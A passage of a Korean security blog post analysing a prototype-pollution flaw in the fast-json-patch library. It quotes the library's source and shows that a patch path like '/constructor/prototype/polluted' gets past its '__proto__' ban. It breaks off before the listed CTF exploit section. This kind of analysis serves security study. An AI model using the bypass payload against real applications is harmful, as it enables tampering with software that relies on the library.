<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="TR;DL Prototype Pollution   Analysis : Introduce 위 사진을 보면 fast-json-patch 모듈의 applyPatch() 메서드를 이용해서 a라는 메서드를 패치 시켜주는데, 이때 내부 오퍼레이션에 의해서 Prototype Pollution 취약점이 발생한다. 인자로는 2개의 값을 보내주는 것을 볼 수 있다. 첫 번째">
<meta property="og:type" content="article">
<meta property="og:title" content="Prototype Pollution in fast-json-patch module">
<meta property="og:url" content="http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/index.html">
<meta property="og:site_name" content="Home">
<meta property="og:description" content="TR;DL Prototype Pollution   Analysis : Introduce 위 사진을 보면 fast-json-patch 모듈의 applyPatch() 메서드를 이용해서 a라는 메서드를 패치 시켜주는데, 이때 내부 오퍼레이션에 의해서 Prototype Pollution 취약점이 발생한다. 인자로는 2개의 값을 보내주는 것을 볼 수 있다. 첫 번째">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/wjddnjs33/image/blob/main/prototype/prototype1.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/image/blob/main/prototype/%5B1.png?raw=true">
<meta property="og:image" content="https://github.com/wjddnjs33/image/blob/main/prototype/flag.png?raw=true">
<meta property="article:published_time" content="2021-05-31T00:01:00.000Z">
<meta property="article:modified_time" content="2021-05-31T12:51:58.135Z">
<meta property="article:author" content="Jeongwon Jo">
<meta property="article:tag" content="Prototype Pollution">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/wjddnjs33/image/blob/main/prototype/prototype1.png?raw=true">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Prototype Pollution in fast-json-patch module</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2021/05/17/2021-05-17-3kCTF-2021/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&text=Prototype Pollution in fast-json-patch module"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&is_video=false&description=Prototype Pollution in fast-json-patch module"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Prototype Pollution in fast-json-patch module&body=Check out this article: http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&title=Prototype Pollution in fast-json-patch module"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&name=Prototype Pollution in fast-json-patch module&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/31/2021-05-31-Prototype-Pollution-in-JsonPatch/&t=Prototype Pollution in fast-json-patch module"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#TR-DL"><span class="toc-number">1.</span> <span class="toc-text">TR;DL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-Introduce"><span class="toc-number">2.</span> <span class="toc-text">Analysis : Introduce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-applyPatch"><span class="toc-number">3.</span> <span class="toc-text">Analysis : applyPatch()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analsys-applyOperation"><span class="toc-number">4.</span> <span class="toc-text">Analsys : applyOperation()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-objOps"><span class="toc-number">5.</span> <span class="toc-text">Analysis : objOps</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploit-Web-pwn2win-CTF-2021-152-pts"><span class="toc-number">6.</span> <span class="toc-text">Exploit (Web) pwn2win CTF 2021 [152 pts]</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Prototype Pollution in fast-json-patch module
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Jeongwon Jo</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-05-31T00:01:00.000Z" itemprop="datePublished">2021-05-31</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Analysis/">Analysis</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Prototype-Pollution/" rel="tag">Prototype Pollution</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="TR-DL"><a href="#TR-DL" class="headerlink" title="TR;DL"></a>TR;DL</h2><blockquote>
<p>Prototype Pollution</p>
</blockquote>
<hr>
<h2 id="Analysis-Introduce"><a href="#Analysis-Introduce" class="headerlink" title="Analysis : Introduce"></a>Analysis : Introduce</h2><p><img src="https://github.com/wjddnjs33/image/blob/main/prototype/prototype1.png?raw=true"></p>
<p>위 사진을 보면 <code>fast-json-patch</code> 모듈의 <code>applyPatch()</code> 메서드를 이용해서 a라는 메서드를 패치 시켜주는데, 이때 내부 오퍼레이션에 의해서 <code>Prototype Pollution</code> 취약점이 발생한다. 인자로는 2개의 값을 보내주는 것을 볼 수 있다. 첫 번째 인자는 패치할 주체가 들어가고, 두 번째 인자로는 패치의 적용할 데이터를 <code>Json</code> 형식으로 보내는 것을 볼 수 있고, 이 두 번째 인자에서 두 번째 값인 <code>path</code> 키의 대해서 <code>Prototype Pollution</code> 취약점이 발생한다.</p>
<hr>
<h2 id="Analysis-applyPatch"><a href="#Analysis-applyPatch" class="headerlink" title="Analysis : applyPatch()"></a>Analysis : applyPatch()</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">applyPatch</span>(<span class="params"><span class="built_in">document</span>, patch, validateOperation, mutateDocument, banPrototypeModifications</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (mutateDocument === <span class="keyword">void</span> <span class="number">0</span>) &#123; mutateDocument = <span class="literal">true</span>; &#125;</span><br><span class="line">    <span class="keyword">if</span> (banPrototypeModifications === <span class="keyword">void</span> <span class="number">0</span>) &#123; banPrototypeModifications = <span class="literal">true</span>; &#125;</span><br><span class="line">    <span class="keyword">if</span> (validateOperation) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">Array</span>.isArray(patch)) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">exports</span>.JsonPatchError(<span class="string">&#x27;Patch sequence must be an array&#x27;</span>, <span class="string">&#x27;SEQUENCE_NOT_AN_ARRAY&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!mutateDocument) &#123;</span><br><span class="line">        <span class="built_in">document</span> = helpers_js_1._deepClone(<span class="built_in">document</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> results = <span class="keyword">new</span> <span class="built_in">Array</span>(patch.length);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>, length_1 = patch.length; i &lt; length_1; i++) &#123;</span><br><span class="line">        <span class="comment">// we don&#x27;t need to pass mutateDocument argument because if it was true, we already deep cloned the object, we&#x27;ll just pass `true`</span></span><br><span class="line">        results[i] = applyOperation(<span class="built_in">document</span>, patch[i], validateOperation, <span class="literal">true</span>, banPrototypeModifications, i);</span><br><span class="line">        <span class="built_in">document</span> = results[i].newDocument; <span class="comment">// in case root was replaced</span></span><br><span class="line">    &#125;</span><br><span class="line">    results.newDocument = <span class="built_in">document</span>;</span><br><span class="line">    <span class="keyword">return</span> results;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>applyPatch()</code> 메서드는 <code>core.js</code> 파일에 정의가 되어 있다. 코드를 보면 중간 부분에 <code>patch</code> 배열을 <code>for</code> 문으로 돌려가며 하나씩 <code>applyOperation()</code> 메서드의 두 번째 인자로 넘겨주는 것을 볼 수 있고, 첫 번째 인자는 당연 우리가 보내준 패치 될 주체이다. 여기서 <code>patch</code>는 우리가 위에서 <code>applyPatch()</code> 함수에 넘겨준 두 번째 인자값이 된다.</p>
<p><code>applyOperation()</code> 메서드를 호출하는 것을 보면 우리가 보낸 패치 파일을 다중으로 적용하는 것이 아닌 단일로 하나씩 적용하는 것으로 보인다.</p>
<hr>
<h2 id="Analsys-applyOperation"><a href="#Analsys-applyOperation" class="headerlink" title="Analsys : applyOperation()"></a>Analsys : applyOperation()</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">applyOperation</span>(<span class="params"><span class="built_in">document</span>, operation, validateOperation, mutateDocument, banPrototypeModifications, index</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (validateOperation === <span class="keyword">void</span> <span class="number">0</span>) &#123; validateOperation = <span class="literal">false</span>; &#125;</span><br><span class="line">    <span class="keyword">if</span> (mutateDocument === <span class="keyword">void</span> <span class="number">0</span>) &#123; mutateDocument = <span class="literal">true</span>; &#125;</span><br><span class="line">    <span class="keyword">if</span> (banPrototypeModifications === <span class="keyword">void</span> <span class="number">0</span>) &#123; banPrototypeModifications = <span class="literal">true</span>; &#125;</span><br><span class="line">    <span class="keyword">if</span> (index === <span class="keyword">void</span> <span class="number">0</span>) &#123; index = <span class="number">0</span>; &#125;</span><br><span class="line">    <span class="keyword">if</span> (validateOperation) &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">typeof</span> validateOperation == <span class="string">&#x27;function&#x27;</span>) &#123;</span><br><span class="line">            validateOperation(operation, <span class="number">0</span>, <span class="built_in">document</span>, operation.path);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            validator(operation, <span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">/* ROOT OPERATIONS */</span></span><br><span class="line">    <span class="keyword">if</span> (operation.path === <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> returnValue = &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span> &#125;;</span><br><span class="line">        <span class="keyword">if</span> (operation.op === <span class="string">&#x27;add&#x27;</span>) &#123;</span><br><span class="line">        ...</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (!mutateDocument) &#123;</span><br><span class="line">            <span class="built_in">document</span> = helpers_js_1._deepClone(<span class="built_in">document</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">var</span> path = operation.path || <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> keys = path.split(<span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">        <span class="keyword">var</span> obj = <span class="built_in">document</span>;</span><br><span class="line">        <span class="keyword">var</span> t = <span class="number">1</span>; <span class="comment">//skip empty element - http://jsperf.com/to-shift-or-not-to-shift</span></span><br><span class="line">        <span class="keyword">var</span> len = keys.length;</span><br><span class="line">        <span class="keyword">var</span> existingPathFragment = <span class="literal">undefined</span>;</span><br><span class="line">        <span class="keyword">var</span> key = <span class="keyword">void</span> <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">var</span> validateFunction = <span class="keyword">void</span> <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">typeof</span> validateOperation == <span class="string">&#x27;function&#x27;</span>) &#123;</span><br><span class="line">            validateFunction = validateOperation;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            validateFunction = validator;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">while</span> (<span class="literal">true</span>) &#123;</span><br><span class="line">            key = keys[t];</span><br><span class="line">            <span class="keyword">if</span> (banPrototypeModifications &amp;&amp; key == <span class="string">&#x27;__proto__&#x27;</span>) &#123;</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">TypeError</span>(<span class="string">&#x27;JSON-Patch: modifying `__proto__` prop is banned for security reasons, if this was on purpose, please set `banPrototypeModifications` flag false and pass it to this function. More info in fast-json-patch README&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (validateOperation) &#123;</span><br><span class="line">                <span class="keyword">if</span> (existingPathFragment === <span class="literal">undefined</span>) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (obj[key] === <span class="literal">undefined</span>) &#123;</span><br><span class="line">                        existingPathFragment = keys.slice(<span class="number">0</span>, t).join(<span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">else</span> <span class="keyword">if</span> (t == len - <span class="number">1</span>) &#123;</span><br><span class="line">                        existingPathFragment = operation.path;</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">if</span> (existingPathFragment !== <span class="literal">undefined</span>) &#123;</span><br><span class="line">                        validateFunction(operation, <span class="number">0</span>, <span class="built_in">document</span>, existingPathFragment);</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            t++;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">Array</span>.isArray(obj)) &#123;</span><br><span class="line">                <span class="keyword">if</span> (key === <span class="string">&#x27;-&#x27;</span>) &#123;</span><br><span class="line">                    key = obj.length;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">if</span> (validateOperation &amp;&amp; !helpers_js_1.isInteger(key)) &#123;</span><br><span class="line">                        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">exports</span>.JsonPatchError(<span class="string">&quot;Expected an unsigned base-10 integer value, making the new referenced value the array element with the zero-based index&quot;</span>, <span class="string">&quot;OPERATION_PATH_ILLEGAL_ARRAY_INDEX&quot;</span>, index, operation, <span class="built_in">document</span>);</span><br><span class="line">                    &#125; <span class="comment">// only parse key when it&#x27;s an integer for `arr.prop` to work</span></span><br><span class="line">                    <span class="keyword">else</span> <span class="keyword">if</span> (helpers_js_1.isInteger(key)) &#123;</span><br><span class="line">                        key = ~~key;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span> (t &gt;= len) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (validateOperation &amp;&amp; operation.op === <span class="string">&quot;add&quot;</span> &amp;&amp; key &gt; obj.length) &#123;</span><br><span class="line">                        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">exports</span>.JsonPatchError(<span class="string">&quot;The specified index MUST NOT be greater than the number of elements in the array&quot;</span>, <span class="string">&quot;OPERATION_VALUE_OUT_OF_BOUNDS&quot;</span>, index, operation, <span class="built_in">document</span>);</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">var</span> returnValue = arrOps[operation.op].call(operation, obj, key, <span class="built_in">document</span>); <span class="comment">// Apply patch</span></span><br><span class="line">                    <span class="keyword">if</span> (returnValue.test === <span class="literal">false</span>) &#123;</span><br><span class="line">                        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">exports</span>.JsonPatchError(<span class="string">&quot;Test operation failed&quot;</span>, <span class="string">&#x27;TEST_OPERATION_FAILED&#x27;</span>, index, operation, <span class="built_in">document</span>);</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">return</span> returnValue;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">if</span> (key &amp;&amp; key.indexOf(<span class="string">&#x27;~&#x27;</span>) != -<span class="number">1</span>) &#123;</span><br><span class="line">                    key = helpers_js_1.unescapePathComponent(key);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span> (t &gt;= len) &#123;</span><br><span class="line">                    <span class="keyword">var</span> returnValue = objOps[operation.op].call(operation, obj, key, <span class="built_in">document</span>); <span class="comment">// Apply patch</span></span><br><span class="line">                    <span class="keyword">if</span> (returnValue.test === <span class="literal">false</span>) &#123;</span><br><span class="line">                        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">exports</span>.JsonPatchError(<span class="string">&quot;Test operation failed&quot;</span>, <span class="string">&#x27;TEST_OPERATION_FAILED&#x27;</span>, index, operation, <span class="built_in">document</span>);</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">return</span> returnValue;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            obj = obj[key];</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>applyOperation()</code> 메서드를 보면 중간에 슬래쉬를 이용해서 <code>path</code> 값을 스플릿하는 것을 볼 수 있다. 우리는 path의 값으로 <code>&quot;/constructor/prototype/polluted&quot;</code>와 같이 주었기 때문에 keys의 값은 <code>[&#39;constructor&#39;, &#39;prototype&#39;, &#39;polluted&#39;]</code>가 된다.</p>
<p>이렇게 값을 스플릿 해준 후에 keys.length만큼 와일문을 돌린다. 이때 <code>keys</code> 값으로 <code>__proto__</code>가 들어오면 <code>JSON-Patch: modifying &#39;__proto__&#39; prop is banned for security reasons, if this was on purpose, please set &#39;banPrototypeModifications&#39; flag false and pass it to this function. More info in fast-json-patch READM</code>와 같은 구문을 출력하고 끝내는 것을 볼 수 있다. 아마도 <code>Prototype Pollution</code>을 방지한 것 같다.</p>
<p><img src="https://github.com/wjddnjs33/image/blob/main/prototype/%5B1.png?raw=true"></p>
<p>하지만 <code>__proto__</code> 프로퍼티와 <code>constructor.prototype</code> 프로퍼티는 동일하기 때문에 이를 이용해서 <code>Prototype Pollution</code> 공격을 할 수 있다.</p>
<p>와일문을 돌면서 if 문을 이용해서 조건에 맞는 오퍼레이션을 하는 것으로 보인다.</p>
<ul>
<li>첫 번째 조건은 일단 key의 값으로 <code>__proto__</code>가 존재하지 않아야 한다.</li>
<li>두 번째 조건은 <code>validateOperation</code>의 값이 참이어야 한다.</li>
<li>세 번째 조건은 우리가 전달해준 패치가 될 주체가 <code>Array</code>여야 한다.</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (key &amp;&amp; key.indexOf(<span class="string">&#x27;~&#x27;</span>) != -<span class="number">1</span>) &#123;</span><br><span class="line">        key = helpers_js_1.unescapePathComponent(key);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (t &gt;= len) &#123;</span><br><span class="line">        <span class="keyword">var</span> returnValue = objOps[operation.op].call(operation, obj, key, <span class="built_in">document</span>); <span class="comment">// Apply patch</span></span><br><span class="line">        <span class="keyword">if</span> (returnValue.test === <span class="literal">false</span>) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">exports</span>.JsonPatchError(<span class="string">&quot;Test operation failed&quot;</span>, <span class="string">&#x27;TEST_OPERATION_FAILED&#x27;</span>, index, operation, <span class="built_in">document</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> returnValue;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>위 세 가지지 조건을 모두 위배할 경우에는 위 코드가 실행이 된다. 일단 우리는 <code>patch</code>의 값으로 <code>~</code>가 들어간 곳이 없기 때문에 3번 모두 else문이 실행이 될 것 이다. else 문을 보면 <code>objOps</code>를 이용해서 패치를 하는 것을 볼 수 있고, 인자로는 연산자, 패치 될 주체, 패치할 값, 패치 될 주체를 넘겨주고 있는 것을 볼 수 있다. 여기서 우리는 연산자를 넘겨줄 때, <code>replace</code>를 넘겨주었다.</p>
<hr>
<h2 id="Analysis-objOps"><a href="#Analysis-objOps" class="headerlink" title="Analysis : objOps"></a>Analysis : objOps</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> objOps = &#123;</span><br><span class="line">    add: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        obj[key] = <span class="built_in">this</span>.value;</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span> &#125;;</span><br><span class="line">    &#125;,</span><br><span class="line">    remove: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> removed = obj[key];</span><br><span class="line">        <span class="keyword">delete</span> obj[key];</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span>, <span class="attr">removed</span>: removed &#125;;</span><br><span class="line">    &#125;,</span><br><span class="line">    replace: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> removed = obj[key];</span><br><span class="line">        obj[key] = <span class="built_in">this</span>.value;</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span>, <span class="attr">removed</span>: removed &#125;;</span><br><span class="line">    &#125;,</span><br><span class="line">    move: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        <span class="comment">/* in case move target overwrites an existing value,</span></span><br><span class="line"><span class="comment">        return the removed value, this can be taxing performance-wise,</span></span><br><span class="line"><span class="comment">        and is potentially unneeded */</span></span><br><span class="line">        <span class="keyword">var</span> removed = getValueByPointer(<span class="built_in">document</span>, <span class="built_in">this</span>.path);</span><br><span class="line">        <span class="keyword">if</span> (removed) &#123;</span><br><span class="line">            removed = 